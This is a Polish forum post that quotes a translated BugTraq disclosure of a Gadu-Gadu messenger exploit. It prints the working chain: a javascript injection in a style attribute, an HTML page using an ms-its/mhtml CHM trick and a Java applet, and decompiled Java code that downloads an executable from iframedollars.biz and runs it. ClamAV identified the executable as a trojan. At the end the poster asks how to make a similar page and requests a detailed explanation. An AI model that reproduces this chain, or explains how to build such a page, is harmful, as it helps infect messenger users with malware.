Kod:
Niedawno, informowaliśmy o dwóch poważnych błędach w popularnym komunikatorze Gadu-Gadu. Jeden z nich pozwalał na wykonanie kodu javascript na komputerze ofiary. Jak informuje Przemysław Frasunek na BugTraq, istnieje już exploit pozwalający na wykonanie dowolnego programu poprzez wstrzyknięcie samego javascriptu!
Poniżej tłumaczenie wiadomości wysłanej przez Przemysława Frasunka:
Właśnie otrzymałem następującą wiadomość z bramki WWW na konto GG:
www.po"style=background-image:url(javascript:window.open('http://iframedollars.biz/dl/adv407.php','','left=10000'));".pl
Plik adv407.php zawierał następujący kod html:
[html][head]
[/head][body]
[textarea id="cxw" style="display:none;"]
[object data="${PR}" type="text/x-scriptlet"][/object]
[/textarea]
[script language="javascript"]
document.write(cxw.value.replace(/${PR}/g,'ms-its:mhtml:file://c:nosuch.mht!http://iframedollars.biz/dl/adv407/x.chm::/x.htm'));
[/script]
[applet width=1 height=1 ARCHIVE=loaderadv407.jar
code=Counter][/APPLET][/body][/html]
Po ściągnięciu i zdekompilowaniu loaderadv407.jar, zauważyłem czym to jest:
URL url1 = new URL("http://iframedollars.biz/dl/loadadv407.exe");
URLConnection urlconnection = url1.openConnection();
[...]
FileOutputStream fileoutputstream = new FileOutputStream(s4 + "loadnew.exe");
[...]
as[0] = s4 + "loadnew.exe";
Process process = Runtime.getRuntime().exec(as);
Clamav rozpoznał binarke jako Trojan.Qhost.O.Jak mogę zrobić podobną stronę ?
Proszę o szczegółowe wyjaśnienie